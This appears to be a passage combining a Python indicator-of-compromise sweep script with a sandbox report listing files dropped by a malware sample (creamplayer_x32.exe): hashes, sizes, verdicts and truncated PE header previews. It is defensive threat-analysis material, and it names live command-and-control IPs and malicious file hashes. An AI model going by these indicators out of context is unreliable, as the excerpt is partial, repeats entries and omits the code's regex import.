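from collections import Counter
from dataclasses import dataclass

# Hosts contacted by the sample (IP table above).
IOC_IPS = {"31.214.157.206", "188.119.66.185"}
# SHA-256 of the first two dropped files in the file details (lower-case for matching).
IOC_SHA256 = {
    "622a75b5d62939b7e2385b7d35b49d6e3e50d582452a9225f7d61f62c4fc8bd8",
    "16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660",
}
# The path is the indicator here, not the DLL: it recurs across related
# samples (association table above) even where the DLL itself has a benign reputation.
IOC_PATHS = {r"c:\programdata\smartimagedrive\sqlite3.dll"}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HEX64_RE = re.compile(r"\b[0-9a-fA-F]{64}\b")
WINPATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"',;|]+")


@dataclass(frozen=True)
class Hit:
    line_no: int   # 1-based index into the swept lines
    kind: str      # "ip", "sha256" or "path"
    indicator: str # the matched indicator, normalised to lower case


def sweep(lines) -> list:
    """Return one Hit per (line, indicator) pair; a line may produce several."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ip in IPV4_RE.findall(line):
            if ip in IOC_IPS:
                hits.append(Hit(n, "ip", ip))
        for digest in HEX64_RE.findall(line):
            if digest.lower() in IOC_SHA256:
                hits.append(Hit(n, "sha256", digest.lower()))
        for path in WINPATH_RE.findall(line):
            if path.lower() in IOC_PATHS:
                hits.append(Hit(n, "path", path.lower()))
    return hits


def summarize(hits) -> dict:
    """Count of hits per indicator kind, e.g. {"ip": 2, "sha256": 1, "path": 1}."""
    return dict(Counter(h.kind for h in hits))


# Constructed sample input: two Zeek-style conn records, one EDR-style file
# event, and one record that must not match (203.0.113.7 is a documentation address).
SAMPLE_LOGS = [
    "2024-12-14T13:08:01Z zeek conn id.orig_h=10.0.0.12 id.resp_h=188.119.66.185 id.resp_p=443 proto=tcp",
    "2024-12-14T13:08:03Z zeek conn id.orig_h=10.0.0.12 id.resp_h=203.0.113.7 id.resp_p=443 proto=tcp",
    "2024-12-14T13:08:05Z edr FileCreate path=C:\\ProgramData\\SmartImageDrive\\sqlite3.dll "
    "sha256=16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660",
    "2024-12-14T13:08:06Z zeek conn id.orig_h=10.0.0.12 id.resp_h=31.214.157.206 id.resp_p=80 proto=tcp",
]

if __name__ == "__main__":
    for hit in sweep(SAMPLE_LOGS):
        print(hit)
    print(summarize(sweep(SAMPLE_LOGS)))
```

Hash and path comparisons are case-folded because EDR products differ in the case they emit; IP matching is exact. Running the sweep over a real log export is a matter of replacing SAMPLE_LOGS with the file's lines.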
                                                                                                  Process:C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4668655
                                                                                                  Entropy (8bit):6.651425624514438
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:Zejussm5VOWiN0WcZR989Awg5t6VVa0/WXD6JB3F:07Z5QV3c8AEa0/WXD6JtF
                                                                                                  MD5:A3E56DEA396FF196EFE4C3E60B998E88
                                                                                                  SHA1:2B764B543F242F8D57F7BDB04D91227F3C0590D8
                                                                                                  SHA-256:622A75B5D62939B7E2385B7D35B49D6E3E50D582452A9225F7D61F62C4FC8BD8
                                                                                                  SHA-512:ECCA0AB8D89F473AFD4CC2676917EB0CC9BCD9A8227654E161D99A034AEB14636CF908BF2C7C4C635948D3A943415E4C2DCCF2580D941E519DC1E9C3152371A9
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\SmartImageDrive\SmartImageDrive.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  Reputation:low
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...^.\g.....................t.......M............@...........................G.......G..............................................@..................................................................................4............................aett3..J........................... ..`.aftt3..t...........................@..@.agtt3...d.......0..................@....rsrc........@......................@..@.ahtt3...h...@)..f....(.............`.,.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):645592
                                                                                                  Entropy (8bit):6.50414583238337
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                  MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                  SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                  SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                  SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
• Filename: Ni2ghr9eUJ.exe, Detection: malicious
• Filename: Ni2ghr9eUJ.exe, Detection: malicious
• Filename: 2mtt3zE6Vh.exe, Detection: malicious
• Filename: 2mtt3zE6Vh.exe, Detection: malicious
• Filename: 7i6bUvYZ4L.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: imMQqf6YWk.exe, Detection: malicious
• Filename: imMQqf6YWk.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                  Process:C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8
                                                                                                  Entropy (8bit):2.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:/S/:a/
                                                                                                  MD5:AFCA2C73DD843F1CDFD3C27C4F3F7B41
                                                                                                  SHA1:8A4ADE83D89897D1266E618A8D425EAA4E604250
                                                                                                  SHA-256:09C3DCA067648BA3CC66C6515080233511E1E61A269F1A1429C062BCE75970D9
                                                                                                  SHA-512:5144EC0896379415F2BDCC220234F3ED78174EF50E27314B1A17878B2394B12973F52D7741BA5D6F834A76835587C2E40EF53FFBF603E809A36CC64CBE3672CC
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:R.]g....

Process:C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
File Type:data
Category:dropped
Size (bytes):4
Entropy (8bit):0.8112781244591328
Encrypted:false
SSDEEP:3:U:U
MD5:2B197A84C60EC779B10736BB6475B5E9
SHA1:C66F455EC1C14E38154F75BAF37ADD2E728EE0C1
SHA-256:0623CCB9B1619BD388284A438034D8CB6431964BA727D8B1C450303105735488
SHA-512:702414B61E87C6FFBB92A6B3B2E240639B6878560C62051FE641135A9352ED14A64CA844A641F5E330798E074DEEE8C52E0E721F16CCB37C000B3411CABD2060
Malicious:false
Reputation:low
Preview:....

Process:C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):128
Entropy (8bit):2.9012093522336393
Encrypted:false
SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
MD5:679DD163372163CD8FFC24E3C9E758B3
SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
Malicious:false
Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................

Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):265728
Entropy (8bit):6.4472652154517345
Encrypted:false
SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
MD5:752CA72DE243F44AF2ED3FF023EF826E
SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
File Type:MS Windows HtmlHelp Data
Category:dropped
Size (bytes):78183
Entropy (8bit):7.692742945771669
Encrypted:false
SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
MD5:B1B9E6D43319F6D4E52ED858C5726A97
SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
Malicious:false
Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet

Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):176128
Entropy (8bit):6.204917493416147
Encrypted:false
SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
MD5:FEC4FF0C2967A05543747E8D552CF9DF
SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):4668655
Entropy (8bit):6.651425624514438
Encrypted:false
SSDEEP:49152:Zejussm5VOWiN0WcZR989Awg5t6VVa0/WXD6JB3F:07Z5QV3c8AEa0/WXD6JtF
MD5:A3E56DEA396FF196EFE4C3E60B998E88
SHA1:2B764B543F242F8D57F7BDB04D91227F3C0590D8
SHA-256:622A75B5D62939B7E2385B7D35B49D6E3E50D582452A9225F7D61F62C4FC8BD8
SHA-512:ECCA0AB8D89F473AFD4CC2676917EB0CC9BCD9A8227654E161D99A034AEB14636CF908BF2C7C4C635948D3A943415E4C2DCCF2580D941E519DC1E9C3152371A9
Malicious:true
Yara Hits:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe, Author: Joe Security
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...^.\g.....................t.......M............@...........................G.......G..............................................@..................................................................................4............................aett3..J........................... ..`.aftt3..t...........................@..@.agtt3...d.......0..................@....rsrc........@......................@..@.ahtt3...h...@)..f....(.............`.,.........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1645320
Entropy (8bit):6.787752063353702
Encrypted:false
SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
MD5:871C903A90C45CA08A9D42803916C3F7
SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):265728
Entropy (8bit):6.4472652154517345
Encrypted:false
SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
MD5:752CA72DE243F44AF2ED3FF023EF826E
SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):348160
Entropy (8bit):6.542655141037356
Encrypted:false
SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
MD5:86F1895AE8C5E8B17D99ECE768A70732
SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):499712
Entropy (8bit):6.414789978441117
Encrypted:false
SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
MD5:561FA2ABB31DFA8FAB762145F81667C2
SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):176128
Entropy (8bit):6.204917493416147
Encrypted:false
SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
MD5:FEC4FF0C2967A05543747E8D552CF9DF
SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1645320
Entropy (8bit):6.787752063353702
Encrypted:false
SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
MD5:871C903A90C45CA08A9D42803916C3F7
SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4668655
                                                                                                  Entropy (8bit):6.651425418502328
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:uejussm5VOWiN0WcZR989Awg5t6VVa0/WXD6JB3F:H7Z5QV3c8AEa0/WXD6JtF
                                                                                                  MD5:77F7E9BB09981D650745FD07B22494F2
                                                                                                  SHA1:63EF8FA5BC0CDE86756696878D581B3EB048B194
                                                                                                  SHA-256:62B1ED66AFBFC5AD8AE43967C17FD425AD4F3E35F781541BB60ECEE43616BCA8
                                                                                                  SHA-512:553EC83E65F2756C6715DA1122C0744D390DB39DE87606986877537086CDA1A7F5ED1E6DB3FDE269F995EB0A5594DC879358DAE1F7AA2D7366D36124CE4B35F4
                                                                                                  Malicious:false
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-JIRG1.tmp, Author: Joe Security
                                                                                                  Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...^.\g.....................t.......M............@...........................G.......G..............................................@..................................................................................4............................aett3..J........................... ..`.aftt3..t...........................@..@.agtt3...d.......0..................@....rsrc........@......................@..@.ahtt3...h...@)..f....(.............`.,.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):645592
                                                                                                  Entropy (8bit):6.50414583238337
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                  MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                  SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                  SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                  SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:MS Windows HtmlHelp Data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):78183
                                                                                                  Entropy (8bit):7.692742945771669
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                                  MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                                  SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                                  SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                                  SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                                  Malicious:false
                                                                                                  Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):445440
                                                                                                  Entropy (8bit):6.439135831549689
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                                                                  MD5:CAC7E17311797C5471733638C0DC1F01
                                                                                                  SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                                                                  SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                                                                  SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
